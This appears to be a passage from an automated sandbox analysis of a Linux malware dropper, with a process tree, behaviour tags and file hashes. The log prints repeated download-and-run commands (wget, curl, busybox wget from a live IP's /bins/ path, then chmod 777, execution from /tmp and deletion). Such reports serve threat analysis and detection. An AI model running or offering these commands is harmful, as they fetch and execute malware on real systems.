/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:927
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:928
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:930
-
-
/bin/chmodchmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:933
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:934
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:936
-
-
/bin/chmodchmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:939
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:940
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:942
-
-
/bin/chmodchmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:945
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:946
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:948
-
-
/bin/chmodchmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:951
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:952
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:954
-
-
/bin/chmodchmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:957
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:958
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:960
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97